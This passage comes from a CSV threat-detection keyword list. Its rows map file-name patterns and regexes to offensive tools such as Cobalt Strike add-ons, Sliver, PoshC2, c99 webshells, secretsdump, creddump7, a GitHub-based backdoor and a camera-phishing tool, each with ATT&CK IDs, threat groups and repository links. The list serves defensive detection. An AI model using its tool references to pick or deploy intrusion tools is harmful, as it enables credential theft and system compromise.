TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","5916" "*/c2profile.*",".{0,1000}\/c2profile\..{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","5917" "*/c2profile.go*",".{0,1000}\/c2profile\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in 
Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/darkr4y/geacon","1","1","N/A","N/A","10","10","1189","206","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z","5918" "*/c2profiles.zip*",".{0,1000}\/c2profiles\.zip.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - 
TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","1","N/A","N/A","9","","N/A","","","","5919" "*/C2Profiles/*",".{0,1000}\/C2Profiles\/.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","5920" "*/C2ReverseProxy.git*",".{0,1000}\/C2ReverseProxy\.git.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","N/A","10","10","486","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z","5921" "*/C2ReverseProxy/*",".{0,1000}\/C2ReverseProxy\/.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","N/A","10","10","486","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z","5922" "*/C2ReverseProxy/tarball*",".{0,1000}\/C2ReverseProxy\/tarball.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","N/A","10","10","486","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z","5923" "*/C2ReverseProxy/zipball*",".{0,1000}\/C2ReverseProxy\/zipball.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - 
T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","N/A","10","10","486","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z","5924" "*/C2ReverseServer*",".{0,1000}\/C2ReverseServer.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","N/A","10","10","486","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z","5925" "*/C2script/*",".{0,1000}\/C2script\/.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool that can perform reverse proxy and cs online without going online","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - 
XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","N/A","10","10","486","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z","5926" "*/C2Server.py*",".{0,1000}\/C2Server\.py.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","5927" "*/C2-Tool-Collection/*",".{0,1000}\/C2\-Tool\-Collection\/.{0,1000}","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","N/A","10","10","1213","204","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z","5928" "*/C3/releases/download/*/C3-*",".{0,1000}\/C3\/releases\/download\/.{0,1000}\/C3\-.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. 
Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP - C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","1","N/A","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","5929" "*/C3WebController.dll*",".{0,1000}\/C3WebController\.dll.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP - C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","1","N/A","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","5930" "*/c99_locus7s.php*",".{0,1000}\/c99_locus7s\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","5931" "*/c99_PSych0.php*",".{0,1000}\/c99_PSych0\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","5932" "*/c99_w4cking.php*",".{0,1000}\/c99_w4cking\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed 
used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","5933" "*/c99madshell.php*",".{0,1000}\/c99madshell\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","5934" "*/c99shell.php*",".{0,1000}\/c99shell\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","5935" "*/cached-domain-credentials.html*",".{0,1000}\/cached\-domain\-credentials\.html.{0,1000}","offensive_tool_keyword","secretsdump","secretdump.py from impacket - https://github.com/fortra/impacket","T1003.003","TA0006","Operation Wocao","Black Basta - Rhysida - HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - ALLANITE","Credential Access","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","5936" "*/cachedump.py*",".{0,1000}\/cachedump\.py.{0,1000}","offensive_tool_keyword","creddump7","extracts various forms of credentials from Windows systems","T1003 - T1081 - T1040 - T1110 - T1555","TA0006 - TA0009","N/A","Sandworm","Credential Access","https://github.com/CiscoCXSecurity/creddump7","1","1","N/A","N/A","10","4","394","106","2020-10-02T13:25:16Z","2014-06-24T13:18:38Z","5937" "*/CACTUSTORCH.git*",".{0,1000}\/CACTUSTORCH\.git.{0,1000}","offensive_tool_keyword","CACTUSTORCH","A 
JavaScript and VBScript shellcode launcher. This will spawn a 32 bit version of the binary specified and inject shellcode into it.","T1055.011 - T1059.005 - T1059.007","TA0002 - TA0005","N/A","APT32","Exploitation tool","https://github.com/mdsecactivebreach/CACTUSTORCH","1","1","N/A","N/A","8","10","1006","227","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z","5938" "*/CaiDao-Webshell-Password-LandGrey.jsp*",".{0,1000}\/CaiDao\-Webshell\-Password\-LandGrey\.jsp.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","5939" "*/cain.html*",".{0,1000}\/cain\.html.{0,1000}","offensive_tool_keyword","Cain&Abel","Cain & Able exploitation tool file ","T1075 - T1110 - T1071 - T1003 - T1555","TA0003 - TA0008","N/A","FIN7 - Night Dragon","Credential Access","https://github.com/undergroundwires/CEH-in-bullet-points/blob/master/chapters/08-sniffing/sniffing-tools.md","1","1","N/A","N/A","N/A","10","1067","310","2024-08-13T04:35:50Z","2021-05-11T12:38:17Z","5940" "*/CamHacker-*.png*",".{0,1000}\/CamHacker\-.{0,1000}\.png.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","1","N/A","N/A","10","","N/A","","","","5941" "*/CamHacker.git*",".{0,1000}\/CamHacker\.git.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. 
If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","1","N/A","N/A","10","","N/A","","","","5942" "*/Cam-Hackers.git*",".{0,1000}\/Cam\-Hackers\.git.{0,1000}","offensive_tool_keyword","Cam-Hackers","Hack Cameras CCTV FREE","T1125","TA0007","N/A","N/A","Discovery","https://github.com/AngelSecurityTeam/Cam-Hackers","1","1","N/A","N/A","6","10","2025","512","2024-08-06T18:49:02Z","2019-11-16T18:49:35Z","5943" "*/campaign/*/implant/get_all*",".{0,1000}\/campaign\/.{0,1000}\/implant\/get_all.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","5944" "*/canary.go",".{0,1000}\/canary\.go","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","5945" "*/CandyPotato.cpp*",".{0,1000}\/CandyPotato\.cpp.{0,1000}","offensive_tool_keyword","CandyPotato","CandyPotato - Pure C++ weaponized fully automated implementation of RottenPotatoNG. 
This tool has been made on top of the original JuicyPotato with the main focus on improving and adding some functionalities which was lacking","T1547.004","TA0002","N/A","Volatile Cedar","Exploitation tool","https://github.com/klezVirus/CandyPotato","1","1","N/A","N/A","N/A","4","306","67","2021-09-16T17:08:52Z","2020-08-21T17:14:30Z","5946" "*/CandyPotato.sdf*",".{0,1000}\/CandyPotato\.sdf.{0,1000}","offensive_tool_keyword","CandyPotato","CandyPotato - Pure C++ weaponized fully automated implementation of RottenPotatoNG. This tool has been made on top of the original JuicyPotato with the main focus on improving and adding some functionalities which was lacking","T1547.004","TA0002","N/A","Volatile Cedar","Exploitation tool","https://github.com/klezVirus/CandyPotato","1","1","N/A","N/A","N/A","4","306","67","2021-09-16T17:08:52Z","2020-08-21T17:14:30Z","5947" "*/CandyPotato.sln*",".{0,1000}\/CandyPotato\.sln.{0,1000}","offensive_tool_keyword","CandyPotato","CandyPotato - Pure C++ weaponized fully automated implementation of RottenPotatoNG. This tool has been made on top of the original JuicyPotato with the main focus on improving and adding some functionalities which was lacking","T1547.004","TA0002","N/A","Volatile Cedar","Exploitation tool","https://github.com/klezVirus/CandyPotato","1","1","N/A","N/A","N/A","4","306","67","2021-09-16T17:08:52Z","2020-08-21T17:14:30Z","5948" "*/CandyPotato.vcxproj*",".{0,1000}\/CandyPotato\.vcxproj.{0,1000}","offensive_tool_keyword","CandyPotato","CandyPotato - Pure C++ weaponized fully automated implementation of RottenPotatoNG. 
This tool has been made on top of the original JuicyPotato with the main focus on improving and adding some functionalities which was lacking","T1547.004","TA0002","N/A","Volatile Cedar","Exploitation tool","https://github.com/klezVirus/CandyPotato","1","1","N/A","N/A","N/A","4","306","67","2021-09-16T17:08:52Z","2020-08-21T17:14:30Z","5949" "*/canisrufus.git*",".{0,1000}\/canisrufus\.git.{0,1000}","offensive_tool_keyword","canisrufus","A stealthy Python based Windows backdoor that uses Github as a command and control server","T1105 - T1071 - T1027","TA0003 - TA0011 - TA0005 - TA0010","N/A","Black Basta","C2","https://github.com/maldevel/canisrufus","1","1","N/A","N/A","10","10","263","78","2017-08-15T15:46:20Z","2017-08-12T06:49:40Z","5950" "*/canisrufus.py*",".{0,1000}\/canisrufus\.py.{0,1000}","offensive_tool_keyword","canisrufus","A stealthy Python based Windows backdoor that uses Github as a command and control server","T1105 - T1071 - T1027","TA0003 - TA0011 - TA0005 - TA0010","N/A","Black Basta","C2","https://github.com/maldevel/canisrufus","1","1","N/A","N/A","10","10","263","78","2017-08-15T15:46:20Z","2017-08-12T06:49:40Z","5951" "*/CapBypass.ps1*",".{0,1000}\/CapBypass\.ps1.{0,1000}","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/rvrsh3ll/TokenTactics","1","0","N/A","N/A","6","7","652","105","2024-12-06T15:51:42Z","2021-07-08T02:28:12Z","5952" "*/capture_netntlmv2.py*",".{0,1000}\/capture_netntlmv2\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - 
TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","1","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","5953" "*/carlosevieira/Dirty-Pipe*",".{0,1000}\/carlosevieira\/Dirty\-Pipe.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/carlosevieira/Dirty-Pipe","1","1","N/A","N/A","N/A","1","9","6","2022-03-07T21:01:15Z","2022-03-07T20:57:34Z","5954" "*/Carseat.git*",".{0,1000}\/Carseat\.git.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","1","N/A","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","5955" "*/CarSeat.py -*",".{0,1000}\/CarSeat\.py\s\-.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","N/A","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","5956" "*/cassandra-brute.nse*",".{0,1000}\/cassandra\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5957" "*/cassandra-info.nse*",".{0,1000}\/cassandra\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5958" "*/catspin.git*",".{0,1000}\/catspin\.git.{0,1000}","offensive_tool_keyword","catspin","Catspin rotates the IP address of HTTP requests making IP based blocks or slowdown measures ineffective. It is based on AWS API Gateway and deployed via AWS Cloudformation.","T1027 - T1071 - T1047 - T1090","TA0042 - TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/rootcathacking/catspin","1","1","N/A","N/A","9","3","261","32","2024-03-01T09:25:02Z","2022-07-26T08:08:33Z","5959" "*/catspin-main/*",".{0,1000}\/catspin\-main\/.{0,1000}","offensive_tool_keyword","catspin","Catspin rotates the IP address of HTTP requests making IP based blocks or slowdown measures ineffective. It is based on AWS API Gateway and deployed via AWS Cloudformation.","T1027 - T1071 - T1047 - T1090","TA0042 - TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/rootcathacking/catspin","1","1","N/A","N/A","9","3","261","32","2024-03-01T09:25:02Z","2022-07-26T08:08:33Z","5960" "*/cc2_frp.*",".{0,1000}\/cc2_frp\..{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. 
thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","N/A","10","10","218","37","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z","5961" "*/cccam-version.nse*",".{0,1000}\/cccam\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5962" "*/ccmpwn.git*",".{0,1000}\/ccmpwn\.git.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","1","N/A","N/A","10","3","201","25","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z","5963" "*/ccmpwn.py*",".{0,1000}\/ccmpwn\.py.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","1","N/A","N/A","10","3","201","25","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z","5964" "*/CCob/Volumiser*",".{0,1000}\/CCob\/Volumiser.{0,1000}","offensive_tool_keyword","Volumiser","Volumiser is a command line tool and interactive console GUI for listing - browsing and extracting files from common virtual machine hard disk image formats.","T1560.001 - T1059 - T1114 - T1005","TA0005 - TA0009","N/A","N/A","Collection","https://github.com/CCob/Volumiser","1","1","N/A","N/A","7","4","379","42","2025-04-22T15:47:53Z","2022-11-08T21:38:56Z","5965" "*/cdk_darwin_amd64*",".{0,1000}\/cdk_darwin_amd64.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - 
